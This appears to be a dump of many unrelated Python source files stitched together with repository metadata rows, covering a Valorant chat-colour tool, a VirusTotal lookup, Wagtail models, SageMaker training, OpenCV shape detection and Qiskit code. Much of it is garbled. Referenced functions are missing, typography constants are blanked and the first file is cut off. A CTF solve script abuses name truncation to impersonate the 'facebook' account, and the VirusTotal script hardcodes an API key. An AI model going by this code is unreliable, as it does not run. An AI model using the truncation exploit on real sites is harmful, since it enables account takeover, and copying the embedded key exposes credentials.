from sklearn import preprocessing
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
import numpy as np
from sklearn.linear_model import LogisticRegression, LogisticRegressionCV
from sklearn.model_selection import StratifiedShuffleSplit
from collections import defaultdict
from sklearn import preprocessing
import random
import datetime
from sklearn.decomposition import PCA
import scipy
from sklearn.metrics import pairwise_distances
from scipy.sparse import issparse, coo_matrix
import sys
| 48.851485 | 138 | 0.667511 |
1159ace76695ba7ee79a54fb2dfd624cc5d70bce | 1,988 | py | Python | main.py | b0kch01/ColorfulValorant | 9fdbcc6ca4626fc3d7f0349eb7564ffac1fc26c2 | [
"MIT"
] | 1 | 2021-06-07T13:52:48.000Z | 2021-06-07T13:52:48.000Z | main.py | B0kCh01/ColorfulValorant | 9fdbcc6ca4626fc3d7f0349eb7564ffac1fc26c2 | [
"MIT"
] | 1 | 2021-09-26T10:49:16.000Z | 2021-09-27T03:27:55.000Z | main.py | b0kch01/ColorfulValorant | 9fdbcc6ca4626fc3d7f0349eb7564ffac1fc26c2 | [
"MIT"
] | null | null | null | # Colorful VALORANT by b0kch01
import os, ctypes
# Disable quick-edit mode (pauses bot)
kernel32 = ctypes.windll.kernel32
kernel32.SetConsoleMode(kernel32.GetStdHandle(-10), 128)
from pyfiglet import Figlet
from termcolor import cprint, colored
import colorama
import keyboard
import time
# Fix legacy console color
colorama.init()
cprint("Setting up...")
cprint(" - [] Windows", "green")
cprint(" - [] Imported Modules", "green")
if ctypes.windll.shell32.IsUserAnAdmin() == 0:
cprint(" - [x] Please run as administrator", "red")
input("[ ENTER ] to quit")
exit(0)
# User Interface
f = Figlet(font="ogre")
bgs = ["on_red", "on_yellow", "on_green", "on_blue", "on_magenta"]
CACHED_TITLESCREEN = f"""
{ "".join([colored(" " + "COLORFUL"[i] + " ", "grey", bgs[i % 4]) for i in range(8)]) }
{ colored(f.renderText("Valorant"), "red") }
{ colored(" Created with by b0kch01! ", "grey", "on_white") }
{ colored(" USE AT YOUR OWN RISK ", "grey", "on_yellow") }
"""
i = 0
colors = [
"<enemy>",
"<team>",
"<system>",
"<notification>",
"<warning>"
]
colorMap = [
"red",
"blue",
"yellow",
"green",
"magenta"
]
keyboard.add_hotkey("\\", makeColor)
keyboard.add_hotkey("up", goUp)
keyboard.add_hotkey("down", goDown)
try:
render()
print("Instructions are on https://github.com/b0kch01/ColorfulValorant")
print("\nEnjoy! :)")
keyboard.wait("up + down")
except KeyboardInterrupt:
exit(0) | 20.708333 | 89 | 0.607646 |
115bab6acf9f1efb52620d943da91627a011d588 | 2,240 | py | Python | virus_total.py | jonschipp/nsm-tools | bc465038bfeb215ca54b67bb4170d607327d0436 | [
"BSD-2-Clause"
] | 3 | 2016-02-26T06:28:47.000Z | 2016-12-09T23:19:35.000Z | virus_total.py | jonschipp/nsm-tools | bc465038bfeb215ca54b67bb4170d607327d0436 | [
"BSD-2-Clause"
] | null | null | null | virus_total.py | jonschipp/nsm-tools | bc465038bfeb215ca54b67bb4170d607327d0436 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
import json
import urllib
import urllib2
import sys
apikey = '843fa2012b619be746ead785b933d59820a2e357c7c186e581e8fcadbe2e550e'
mhash = arguments()
data = query_api(mhash, apikey)
if not in_database(data, mhash):
print 'No entry for %s in database' % mhash
exit(1)
# Positive match found
sha1, filenames, first_seen, last_seen, last_scan_permalink, last_scan_report = collect(data)
if is_malware(last_scan_report):
msg(sha1, filenames, first_seen, last_seen, last_scan_permalink)
exit(0)
else:
print 'Entry %s is not malicious' % mhash
exit(1)
| 27.317073 | 93 | 0.69375 |
115e6da0adc887e907135e22cea5b992136e5b12 | 791 | py | Python | typus/chars.py | byashimov/typus | b0576d6065163cc46a171b90027f2e3321ae7615 | [
"BSD-3-Clause"
] | 65 | 2016-06-15T08:44:58.000Z | 2021-02-02T10:42:23.000Z | typus/chars.py | byashimov/typus | b0576d6065163cc46a171b90027f2e3321ae7615 | [
"BSD-3-Clause"
] | 4 | 2018-11-15T17:10:05.000Z | 2020-01-09T19:44:39.000Z | typus/chars.py | byashimov/typus | b0576d6065163cc46a171b90027f2e3321ae7615 | [
"BSD-3-Clause"
] | 6 | 2017-10-20T16:28:45.000Z | 2021-11-11T18:41:21.000Z | __all__ = (
'ANYSP',
'DLQUO',
'DPRIME',
'LAQUO',
'LDQUO',
'LSQUO',
'MDASH',
'MDASH_PAIR',
'MINUS',
'NBSP',
'NDASH',
'NNBSP',
'RAQUO',
'RDQUO',
'RSQUO',
'SPRIME',
'THNSP',
'TIMES',
'WHSP',
)
NBSP = '\u00A0'
NNBSP = '\u202F'
THNSP = '\u2009'
WHSP = ' '
ANYSP = r'[{}{}{}{}]'.format(WHSP, NBSP, NNBSP, THNSP)
NDASH = ''
MDASH = ''
MDASH_PAIR = NNBSP + MDASH + THNSP
HYPHEN = ''
MINUS = ''
TIMES = ''
LSQUO = '' # left curly quote mark
RSQUO = '' # right curly quote mark/apostrophe
LDQUO = '' # left curly quote marks
RDQUO = '' # right curly quote marks
DLQUO = '' # double low curly quote mark
LAQUO = '' # left angle quote marks
RAQUO = '' # right angle quote marks
SPRIME = ''
DPRIME = ''
| 16.829787 | 54 | 0.525917 |
1160107f399496c19ae30848738f2468e25e6508 | 5,259 | py | Python | src/wagtail_live/models.py | Stormheg/wagtail-live | a5eb79024d44c060079ae7d4707d6220ea66ff5b | [
"BSD-3-Clause"
] | null | null | null | src/wagtail_live/models.py | Stormheg/wagtail-live | a5eb79024d44c060079ae7d4707d6220ea66ff5b | [
"BSD-3-Clause"
] | null | null | null | src/wagtail_live/models.py | Stormheg/wagtail-live | a5eb79024d44c060079ae7d4707d6220ea66ff5b | [
"BSD-3-Clause"
] | null | null | null | """ Wagtail Live models."""
from django.db import models
from django.utils.timezone import now
from wagtail.admin.edit_handlers import FieldPanel, StreamFieldPanel
from wagtail.core.fields import StreamField
from .blocks import LivePostBlock
| 28.895604 | 85 | 0.601065 |
1161293fb1e28e5788a7aa124f039306bb2b8a3e | 2,291 | py | Python | python/test_inprod_analytic.py | solepomies/MAOOAM | 3a30c4030da384a9c4a8510a628c5c1f8ff511cc | [
"MIT"
] | 18 | 2016-04-21T08:45:15.000Z | 2021-11-30T11:21:40.000Z | python/test_inprod_analytic.py | solepomies/MAOOAM | 3a30c4030da384a9c4a8510a628c5c1f8ff511cc | [
"MIT"
] | 1 | 2019-07-15T13:01:21.000Z | 2019-07-15T13:01:21.000Z | python/test_inprod_analytic.py | solepomies/MAOOAM | 3a30c4030da384a9c4a8510a628c5c1f8ff511cc | [
"MIT"
] | 15 | 2016-05-12T12:09:51.000Z | 2021-12-17T18:43:07.000Z | import numpy as np
from inprod_analytic import *
from params_maooam import natm, noc
# Compute the analytic inner products (fills in the `atmos` and `ocean`
# coefficient containers imported from inprod_analytic).
init_inprod()
# Double-precision machine epsilon: coefficients smaller than this are
# treated as exactly zero and skipped when printing.
real_eps = 2.2204460492503131e-16
"""This module print the coefficients computed in the inprod_analytic module"""
# Atmosphere-atmosphere inner products: bilinear a/c and cubic b/g tensors.
# Indices are printed 1-based (i+1, j+1, k+1), matching the reference output.
for i in range(0, natm):
    for j in range(0, natm):
        if(abs(atmos.a[i, j]) >= real_eps):
            print ("a["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % atmos.a[i, j])
        if(abs(atmos.c[i, j]) >= real_eps):
            print ("c["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % atmos.c[i, j])
        for k in range(0, natm):
            if(abs(atmos.b[i, j, k]) >= real_eps):
                # NOTE(review): this format lacks the space after '=' that the
                # other entries have (' =%.5E' vs ' = % .5E') -- kept as-is in
                # case downstream output comparison depends on it; confirm.
                print (
                    "b["+str(i+1)+"]["+str(j+1)+"]["+str(k+1)+"] =%.5E"
                    % atmos.b[i, j, k])
            if(abs(atmos.g[i, j, k]) >= real_eps):
                print (
                    "g["+str(i+1)+"]["+str(j+1)+"]["+str(k+1)+"] = % .5E"
                    % atmos.g[i, j, k])
# Atmosphere-ocean coupling inner products (d, s).
for i in range(0, natm):
    for j in range(0, noc):
        if(abs(atmos.d[i, j]) >= real_eps):
            print ("d["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % atmos.d[i, j])
        if(abs(atmos.s[i, j]) >= real_eps):
            print ("s["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % atmos.s[i, j])
# Ocean-ocean inner products (M, N, cubic O/C) and ocean-atmosphere K/W.
for i in range(0, noc):
    for j in range(0, noc):
        if(abs(ocean.M[i, j]) >= real_eps):
            print ("M["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % ocean.M[i, j])
        if(abs(ocean.N[i, j]) >= real_eps):
            print ("N["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % ocean.N[i, j])
        for k in range(0, noc):
            if(abs(ocean.O[i, j, k]) >= real_eps):
                print (
                    "O["+str(i+1)+"]["+str(j+1)+"]["+str(k+1)+"] = % .5E"
                    % ocean.O[i, j, k])
            if(abs(ocean.C[i, j, k]) >= real_eps):
                print (
                    "C["+str(i+1)+"]["+str(j+1)+"]["+str(k+1)+"] = % .5E"
                    % ocean.C[i, j, k])
        # NOTE(review): this loop re-binds `j` one level inside the ocean
        # j-loop above, so every K/W entry is printed once per ocean mode j
        # -- possibly a mis-indentation (one level too deep); confirm the
        # intended nesting against the reference output before changing.
        for j in range(0, natm):
            if(abs(ocean.K[i, j]) >= real_eps):
                print (
                    "K["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E"
                    % ocean.K[i, j])
            if(abs(ocean.W[i, j]) >= real_eps):
                print (
                    "W["+str(i+1)+"]" + "["+str(j+1)+"] = % .5E"
                    % ocean.W[i, j])
| 38.830508 | 79 | 0.395024 |
11618053ba49ca083edd95cb07327f86424a2f0d | 849 | py | Python | public/views/fallback.py | jgarber623/openstates.org | 0c514c955f7ffbe079c77c3ec00345b20818ad04 | [
"MIT"
] | null | null | null | public/views/fallback.py | jgarber623/openstates.org | 0c514c955f7ffbe079c77c3ec00345b20818ad04 | [
"MIT"
] | null | null | null | public/views/fallback.py | jgarber623/openstates.org | 0c514c955f7ffbe079c77c3ec00345b20818ad04 | [
"MIT"
] | null | null | null | from django.http import Http404, HttpResponse
from django.shortcuts import redirect
import boto3
from botocore.errorfactory import ClientError
from ..models import PersonProxy
| 28.3 | 56 | 0.693757 |
116356ed291907faf2d830bb75f61d5e69fb9f8d | 12,534 | py | Python | tests/test_OptionList.py | CrsiX/dhcppython | c442c3f6eca8244667df8a19d370f7569d81f08f | [
"Apache-2.0"
] | 2 | 2021-09-13T13:35:46.000Z | 2021-11-15T15:33:24.000Z | tests/test_OptionList.py | CrsiX/dhcppython | c442c3f6eca8244667df8a19d370f7569d81f08f | [
"Apache-2.0"
] | 2 | 2021-11-12T08:25:02.000Z | 2021-12-04T02:28:38.000Z | tests/test_OptionList.py | CrsiX/dhcppython | c442c3f6eca8244667df8a19d370f7569d81f08f | [
"Apache-2.0"
] | 3 | 2021-09-08T08:48:30.000Z | 2022-01-21T03:14:11.000Z | import unittest
from dhcppython import options
# Run the test suite when this file is executed directly (e.g. `python test_OptionList.py`).
if __name__ == "__main__":
    unittest.main()
| 40.827362 | 245 | 0.564704 |
11649ccd701bc4417bcc78c7dc346d299411f6ad | 102 | py | Python | keras/legacy_tf_layers/__init__.py | tsheaff/keras | ee227dda766d769b7499a5549e8ed77b5e88105b | [
"Apache-2.0"
] | 37,222 | 2017-12-13T00:52:55.000Z | 2022-03-31T22:34:35.000Z | keras/legacy_tf_layers/__init__.py | amirsadafi/keras | f1e9c76675981ee6683f54a3ce569212d551d12d | [
"Apache-2.0"
] | 7,624 | 2017-12-13T01:03:40.000Z | 2022-03-31T23:57:24.000Z | keras/legacy_tf_layers/__init__.py | amirsadafi/keras | f1e9c76675981ee6683f54a3ce569212d551d12d | [
"Apache-2.0"
] | 14,914 | 2017-12-13T02:30:46.000Z | 2022-03-30T14:49:16.000Z | """Init file."""
from keras.legacy_tf_layers import migration_utils # pylint: disable=unused-import
| 25.5 | 83 | 0.77451 |
1164dd3dd45d08ace50ca4b24008ab7f5c008eee | 1,485 | py | Python | 1stRound/Medium/449-Serialize and Deserialize BST/DFSPreOrder.py | ericchen12377/Leetcode-Algorithm-Python | eb58cd4f01d9b8006b7d1a725fc48910aad7f192 | [
"MIT"
] | 2 | 2020-04-24T18:36:52.000Z | 2020-04-25T00:15:57.000Z | 1stRound/Medium/449-Serialize and Deserialize BST/DFSPreOrder.py | ericchen12377/Leetcode-Algorithm-Python | eb58cd4f01d9b8006b7d1a725fc48910aad7f192 | [
"MIT"
] | null | null | null | 1stRound/Medium/449-Serialize and Deserialize BST/DFSPreOrder.py | ericchen12377/Leetcode-Algorithm-Python | eb58cd4f01d9b8006b7d1a725fc48910aad7f192 | [
"MIT"
] | null | null | null | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
# Your Codec object will be instantiated and called as such:
# Your Codec object will be instantiated and called as such:
# ser = Codec()
# deser = Codec()
# tree = ser.serialize(root)
# ans = deser.deserialize(tree)
# return ans | 29.7 | 97 | 0.534007 |
116638e98b91db5181f4b52e40fed58dce87a1e3 | 1,038 | py | Python | aws_tests/aws_mlops_scripts/sagemaker_trigger.py | Chronicles-of-AI/archives | 23b978a709c785ff00ec90487039944b8ab8f4fb | [
"MIT"
] | null | null | null | aws_tests/aws_mlops_scripts/sagemaker_trigger.py | Chronicles-of-AI/archives | 23b978a709c785ff00ec90487039944b8ab8f4fb | [
"MIT"
] | null | null | null | aws_tests/aws_mlops_scripts/sagemaker_trigger.py | Chronicles-of-AI/archives | 23b978a709c785ff00ec90487039944b8ab8f4fb | [
"MIT"
] | null | null | null | import os
import sagemaker
from sagemaker import get_execution_role
from sagemaker.tensorflow.estimator import TensorFlow
# Launch a SageMaker TensorFlow training job for the mask-detection dataset.
# NOTE(review): running this module submits a real (billable) training job.
sagemaker_session = sagemaker.Session()
# role = get_execution_role()
region = sagemaker_session.boto_session.region_name
# S3 locations of the pre-split train/validation image data.
training_input_path = "s3://intel-edge-poc/mask_dataset_datagen/train/"
validation_input_path = "s3://intel-edge-poc/mask_dataset_datagen/val/"
# Hyperparameters passed through to TrainingJob.py as CLI arguments.
hyperparam = {
    "save_model_dir": "s3://intel-edge-poc/saved/",
    "batch_size": 32,
    "epochs": 2,
    "optimizer": "adam",
    "learning_rate": 1e-3,
}
#'train_dir': 'mask_dataset_datagen/train/',
#'val_dir': 'mask_dataset_datagen/val/'
#'bucket' : 'intel-edge-poc',
# Estimator: single ml.c4.xlarge instance, TensorFlow 2.3 / Python 3.7,
# script-mode entry point TrainingJob.py with an explicit IAM role name.
tf_estimator = TensorFlow(
    entry_point="TrainingJob.py",
    role="intel-edge-poc-role",
    instance_count=1,
    instance_type="ml.c4.xlarge",
    framework_version="2.3",
    py_version="py37",
    hyperparameters=hyperparam,
    script_mode=True,
)
# tf_estimator.fit()
# Kick off training with named channels "training" and "validation".
tf_estimator.fit({"training": training_input_path, "validation": validation_input_path})
| 25.95 | 88 | 0.735067 |
1166eafac1780fdb1b04815e3dcee64d69f82e8c | 314 | py | Python | imgbase/filters.py | olajir/projbase | c434bf5ef0627e7161fe026885a778e8240a26a0 | [
"MIT"
] | null | null | null | imgbase/filters.py | olajir/projbase | c434bf5ef0627e7161fe026885a778e8240a26a0 | [
"MIT"
] | null | null | null | imgbase/filters.py | olajir/projbase | c434bf5ef0627e7161fe026885a778e8240a26a0 | [
"MIT"
] | null | null | null |
import numpy as np
import skimage
import skimage.morphology as morph
import skimage.filters as filt
import skimage.exposure as expo
def get_corrected_image(iimage, gamma=0.25):
    """Gamma-correct *iimage* to emphasise spots.

    The image is converted to a float representation and raised
    element-wise to the power ``gamma``; the default of 0.25 brightens
    dark regions.
    """
    # NOTE(review): img_as_float can return the input array itself when it is
    # already float, in which case the in-place power also mutates the
    # caller's array -- `**=` is kept to preserve that original behaviour.
    corrected = skimage.util.img_as_float(iimage)
    corrected **= gamma
    return corrected
| 19.625 | 48 | 0.745223 |
11677e2c59bc64a37229b6462c616546dac9135c | 398 | py | Python | packages/python/yap_kernel/yap_ipython/utils/tests/test_sysinfo.py | ryandesign/yap | 9a50d1a3d985ec559ebfbb8e9f4d4c6b88b30214 | [
"Artistic-1.0-Perl",
"ClArtistic"
] | 90 | 2015-03-09T01:24:15.000Z | 2022-02-24T13:56:25.000Z | packages/python/yap_kernel/yap_ipython/utils/tests/test_sysinfo.py | ryandesign/yap | 9a50d1a3d985ec559ebfbb8e9f4d4c6b88b30214 | [
"Artistic-1.0-Perl",
"ClArtistic"
] | 52 | 2016-02-14T08:59:37.000Z | 2022-03-14T16:39:35.000Z | packages/python/yap_kernel/yap_ipython/utils/tests/test_sysinfo.py | ryandesign/yap | 9a50d1a3d985ec559ebfbb8e9f4d4c6b88b30214 | [
"Artistic-1.0-Perl",
"ClArtistic"
] | 27 | 2015-11-19T02:45:49.000Z | 2021-11-25T19:47:58.000Z | # coding: utf-8
"""Test suite for our sysinfo utilities."""
# Copyright (c) yap_ipython Development Team.
# Distributed under the terms of the Modified BSD License.
import json
import nose.tools as nt
from yap_ipython.utils import sysinfo
def test_json_getsysinfo():
"""
test that it is easily jsonable and don't return bytes somewhere.
"""
json.dumps(sysinfo.get_sys_info())
| 22.111111 | 70 | 0.728643 |
116964ae9fc7694d62c644302058f5dab73652eb | 268 | py | Python | TestHospital/test/test_login_negative/test_login_invalid_credentials.py | Irshak10/AQA | b5e22e6fdc017040e2fefcf148792ba74fd38b8d | [
"MIT"
] | null | null | null | TestHospital/test/test_login_negative/test_login_invalid_credentials.py | Irshak10/AQA | b5e22e6fdc017040e2fefcf148792ba74fd38b8d | [
"MIT"
] | null | null | null | TestHospital/test/test_login_negative/test_login_invalid_credentials.py | Irshak10/AQA | b5e22e6fdc017040e2fefcf148792ba74fd38b8d | [
"MIT"
] | null | null | null | from Pages.LoginPage import LoginPage
| 19.142857 | 41 | 0.742537 |
116ab6cd1db9f2f070145181b5804b80b331c8fe | 2,040 | py | Python | script2.py | joshigarvitgh/image-processing | 70e3ca093882904d5d995153ca079d000996a240 | [
"Apache-2.0"
] | null | null | null | script2.py | joshigarvitgh/image-processing | 70e3ca093882904d5d995153ca079d000996a240 | [
"Apache-2.0"
] | null | null | null | script2.py | joshigarvitgh/image-processing | 70e3ca093882904d5d995153ca079d000996a240 | [
"Apache-2.0"
] | null | null | null | from pyimagesearch.shapedetector import ShapeDetector
from pyimagesearch.colorlabeler import ColorLabeler
import argparse
import imutils
import numpy as np
import cv2
import argparse
import imutils
# Load the Haar cascades; CascadeClassifier does not raise on a bad path, it
# just yields an empty classifier, hence the explicit empty() checks.
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
if face_cascade.empty(): raise Exception("your face_cascade is empty. are you sure, the path is correct ?")
eye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')
if eye_cascade.empty(): raise Exception("your eye_cascade is empty. are you sure, the path is correct ?")
# Capture from the default webcam (device 0).
video = cv2.VideoCapture(0)
while(video.isOpened()):
    ret, frame = video.read()
    if frame is not None:
        # Work on a 600-px-wide copy; keep the scale factor so detected
        # contours can be mapped back onto the full-resolution frame.
        resized = imutils.resize(frame,width=600)
        ratio=frame.shape[0] / float(resized.shape[0])
        blurred = cv2.GaussianBlur(resized, (5, 5), 0)
        gray = cv2.cvtColor(blurred, cv2.COLOR_BGR2GRAY)
        # LAB colour space is used by ColorLabeler for colour naming.
        lab = cv2.cvtColor(blurred, cv2.COLOR_BGR2LAB)
        thresh = cv2.threshold(gray, 60, 255, cv2.THRESH_BINARY)[1]
        # find contours in the thresholded image and initialize the
        # shape detector
        cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
        # NOTE(review): the tuple layout of findContours differs between
        # OpenCV 2/3/4; this index selection assumes OpenCV 2 or 3 -- confirm
        # against the installed version (OpenCV 4 returns contours at [0]).
        cnts = cnts[0] if imutils.is_cv2() else cnts[1]
        sd = ShapeDetector()
        cl = ColorLabeler()
        # loop over the contours
        for c in cnts:
            # compute the center of the contour, then detect the name of the
            # shape using only the contour
            M = cv2.moments(c)
            #cX = int((M["m10"] / M["m00"]) * ratio)
            #cY = int((M["m01"] / M["m00"]) * ratio)
            shape = sd.detect(c)
            color = cl.label(lab, c)
            print(shape)
            print(color)
            # multiply the contour (x, y)-coordinates by the resize ratio,
            # then draw the contours and the name of the shape on the image
            c = c.astype("float")
            c *= ratio
            c = c.astype("int")
            cv2.drawContours(frame, [c], -1, (0, 255, 0), 2)
            #cv2.putText(frame, shape, (cX, cY), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2)
        cv2.imshow('Video',frame)
        # Quit on 'q' key press.
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
# Release the camera and close the display window.
video.release()
cv2.destroyAllWindows()
| 35.789474 | 107 | 0.698039 |
116af1be02eed7748796fab7b787f2cb8771a926 | 548 | py | Python | 044/main.py | autozimu/projecteuler | 12a8244b7ef9358ac6ca30698cd761c81c3ec925 | [
"MIT"
] | null | null | null | 044/main.py | autozimu/projecteuler | 12a8244b7ef9358ac6ca30698cd761c81c3ec925 | [
"MIT"
] | null | null | null | 044/main.py | autozimu/projecteuler | 12a8244b7ef9358ac6ca30698cd761c81c3ec925 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Project Euler 44 (Python 2): find pentagonal numbers P_j, P_k whose sum and
# difference are both pentagonal, minimising D = |P_k - P_j|.
# s[n] is the n-th pentagonal number; n*(3n-1) is always even so the Python 2
# integer division by 2 is exact.
s = [n * (3 * n - 1) / 2 for n in range(0, 10000)]
found = False
# NOTE(review): the search starts at i=1901 rather than 1 -- presumably a
# hard-coded shortcut from a previous partial run; confirm it does not skip
# the true minimum.
i = 1900
while not found:
    i += 1
    j = 1
    while j < i:
        # actually, we cannot guarentee that j < i, the real condition would
        # be s[i] < 3 * j + 1, which is the distance of s[j] and s[j + 1]. But
        # this one is too time consuming.
        print i, j
        # With P = s[j] and Q = s[j] + s[i]: Q is pentagonal (first test),
        # P + Q = 2*s[j] + s[i] is pentagonal (second test), and
        # Q - P = s[i] is pentagonal by construction -- so D = s[i].
        if (s[i] + s[j]) in s and (2 * s[j] + s[i]) in s:
            print 'found', i, j
            found = True
            break
        else:
            j += 1
# The answer D is the pentagonal number s[i] itself (see note above).
print s[i]
| 23.826087 | 78 | 0.470803 |
116b03d71f4f5e5f3ca2c20583aee06f48a45793 | 911 | py | Python | apt/anonymization/__init__.py | IBM/ai-privacy-toolkit | a9a93c8a3a026b8a4b01266e11698166b7cdbb44 | [
"MIT"
] | 34 | 2021-04-28T15:12:36.000Z | 2022-03-28T11:38:48.000Z | apt/anonymization/__init__.py | IBM/ai-privacy-toolkit | a9a93c8a3a026b8a4b01266e11698166b7cdbb44 | [
"MIT"
] | 13 | 2021-07-14T11:02:35.000Z | 2022-02-23T17:57:51.000Z | apt/anonymization/__init__.py | IBM/ai-privacy-toolkit | a9a93c8a3a026b8a4b01266e11698166b7cdbb44 | [
"MIT"
] | 9 | 2021-05-18T21:26:07.000Z | 2022-03-06T14:58:57.000Z | """
Module providing ML anonymization.
This module contains methods for anonymizing ML model training data, so that when
a model is retrained on the anonymized data, the model itself will also be considered
anonymous. This may help exempt the model from different obligations and restrictions
set out in data protection regulations such as GDPR, CCPA, etc.
The module contains methods that enable anonymizing training datasets in a manner that
is tailored to and guided by an existing, trained ML model. It uses the existing model's
predictions on the training data to train a second, anonymizer model, that eventually determines
the generalizations that will be applied to the training data. For more information about the
method see: https://arxiv.org/abs/2007.13086
Once the anonymized training data is returned, it can be used to retrain the model.
"""
from apt.anonymization.anonymizer import Anonymize
| 50.611111 | 96 | 0.812294 |
116b7b4ac4b9d4a7f8c63237f875c149f4bb08e0 | 2,016 | py | Python | qiskit_code/DeutschJozsa.py | OccumRazor/implement-quantum-algotirhms-with-qiskit | 8574b6505fc34f12eb63e1791e969099d56e3974 | [
"MIT"
] | 3 | 2020-11-03T01:21:48.000Z | 2021-09-23T18:53:40.000Z | qiskit_code/DeutschJozsa.py | OccumRazor/implement-quantum-algotirhms-with-qiskit | 8574b6505fc34f12eb63e1791e969099d56e3974 | [
"MIT"
] | null | null | null | qiskit_code/DeutschJozsa.py | OccumRazor/implement-quantum-algotirhms-with-qiskit | 8574b6505fc34f12eb63e1791e969099d56e3974 | [
"MIT"
] | null | null | null | from qiskit import QuantumRegister,QuantumCircuit
from qiskit.aqua.operators import StateFn
from qiskit.aqua.operators import I
from qiskit_code.quantumMethod import add,ini
from qiskit_code.classicalMethod import Dec2Bi
#DeutschJozsa('constant')
#DeutschJozsa('balanced')
| 38.037736 | 92 | 0.671131 |
116bf2691d7781b16c90385ce38a0af9b3dfe37f | 480 | py | Python | web/products-manager/solve.py | cclauss/fbctf-2019-challenges | 4353c2ce588cf097ac6ca9bcf7b943a99742ac75 | [
"MIT"
] | 213 | 2019-06-14T18:28:40.000Z | 2021-12-27T14:44:45.000Z | web/products-manager/solve.py | cclauss/fbctf-2019-challenges | 4353c2ce588cf097ac6ca9bcf7b943a99742ac75 | [
"MIT"
] | 2 | 2020-06-05T21:14:51.000Z | 2021-06-10T21:34:03.000Z | web/products-manager/solve.py | cclauss/fbctf-2019-challenges | 4353c2ce588cf097ac6ca9bcf7b943a99742ac75 | [
"MIT"
] | 59 | 2019-06-17T17:35:29.000Z | 2021-12-04T22:26:37.000Z | import requests
import random, string
# Random 16-char alphanumeric suffix so each run uses a fresh secret.
x = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(16))
URL = "http://localhost/"
# Secret prefixed to satisfy the app's complexity rules (upper/lower/digits).
secret = "aA11111111" + x
# Registering a user
# The name is padded with 64 spaces + 'abc' -- presumably to exploit a
# column-truncation collision with the plain name 'facebook'; confirm against
# the challenge's schema.
requests.post(url = "%s/add.php" % URL, data = {
    'name': 'facebook' + ' '*64 + 'abc',
    'secret': secret,
    'description': 'desc',
})
# Viewing as 'facebook' with our secret should now return the target entry.
r = requests.post(url = "%s/view.php" % URL, data = {
    'name': 'facebook',
    'secret': secret,
})
print(r.text)
| 21.818182 | 110 | 0.63125 |
feba32dda1863dbf22b57f349bb7f5c4d2450b8d | 737 | py | Python | app/__main__.py | sabuj073/Pyqt | fd316ca81b57cf45c4b02661ae32d3e87da86643 | [
"MIT"
] | 15 | 2019-07-17T04:35:43.000Z | 2022-03-06T10:56:57.000Z | app/__main__.py | SadeghShabestani/pyqt-gui-template | 7b0be93b28519fecef061ae6fd257b5e1414f609 | [
"MIT"
] | null | null | null | app/__main__.py | SadeghShabestani/pyqt-gui-template | 7b0be93b28519fecef061ae6fd257b5e1414f609 | [
"MIT"
] | 7 | 2019-11-02T05:03:01.000Z | 2022-01-22T07:16:35.000Z | import argparse
import sys
import traceback
from .app import Application
sys.excepthook = new_excepthook
if __name__ == '__main__':
main()
| 20.472222 | 75 | 0.663501 |
febafd98c2edf8a650a93925007e3f317d57cdc1 | 848 | py | Python | test/test_1030.py | ralphribeiro/uri-projecteuler | 7151d86e014aea9c56026cc88f50b4e940117dd8 | [
"MIT"
] | null | null | null | test/test_1030.py | ralphribeiro/uri-projecteuler | 7151d86e014aea9c56026cc88f50b4e940117dd8 | [
"MIT"
] | null | null | null | test/test_1030.py | ralphribeiro/uri-projecteuler | 7151d86e014aea9c56026cc88f50b4e940117dd8 | [
"MIT"
] | null | null | null | from unittest import TestCase
from exercicios.ex1030 import calcula_suicidio
import random
| 29.241379 | 66 | 0.59434 |
febbb570031584153cc453531cfad9d62d5b53da | 656 | py | Python | python/enthic/utils/__init__.py | phe-sto/enthic | 0ca3ea949f418ccf72978a92c814b05b82fa3076 | [
"WTFPL"
] | 10 | 2019-12-06T14:19:24.000Z | 2020-11-19T13:12:35.000Z | python/enthic/utils/__init__.py | phe-sto/enthic | 0ca3ea949f418ccf72978a92c814b05b82fa3076 | [
"WTFPL"
] | 25 | 2020-03-31T17:08:22.000Z | 2022-02-10T22:27:43.000Z | python/enthic/utils/__init__.py | phe-sto/enthic | 0ca3ea949f418ccf72978a92c814b05b82fa3076 | [
"WTFPL"
] | null | null | null | # -*- coding: utf-8 -*-
from json import load
from logging import basicConfig
from os.path import join, dirname
from pathlib import Path
################################################################################
# CHECKING THE INPUT AND OUTPUT AND DIRECTORY PATH
# INPUT
with open(join(Path(dirname(__file__)).parent.absolute(), "configuration.json")) as json_configuration_file:
CONFIG = load(json_configuration_file)
################################################################################
# SET LOG LEVEL
basicConfig(level=CONFIG['debugLevel'],
format="%(asctime)s [%(levelname)8s] %(message)s (%(filename)s:%(lineno)s)")
| 41 | 108 | 0.551829 |
febd1a039c30d408c01acbf196e318f0a33735b0 | 2,177 | py | Python | src/messageHandler.py | lorandcheng/ee250-final-project | e99da9b0221b4f3fdf4737814b9fa4b9152e15d6 | [
"MIT"
] | null | null | null | src/messageHandler.py | lorandcheng/ee250-final-project | e99da9b0221b4f3fdf4737814b9fa4b9152e15d6 | [
"MIT"
] | null | null | null | src/messageHandler.py | lorandcheng/ee250-final-project | e99da9b0221b4f3fdf4737814b9fa4b9152e15d6 | [
"MIT"
] | null | null | null | # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Author: Lorand Cheng https://github.com/lorandcheng
# Date: Nov 15, 2020
# Project: USC EE250 Final Project, Morse Code Translator and Messenger
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
import json
import requests
from datetime import datetime
from pprint import pprint
| 28.272727 | 97 | 0.519982 |
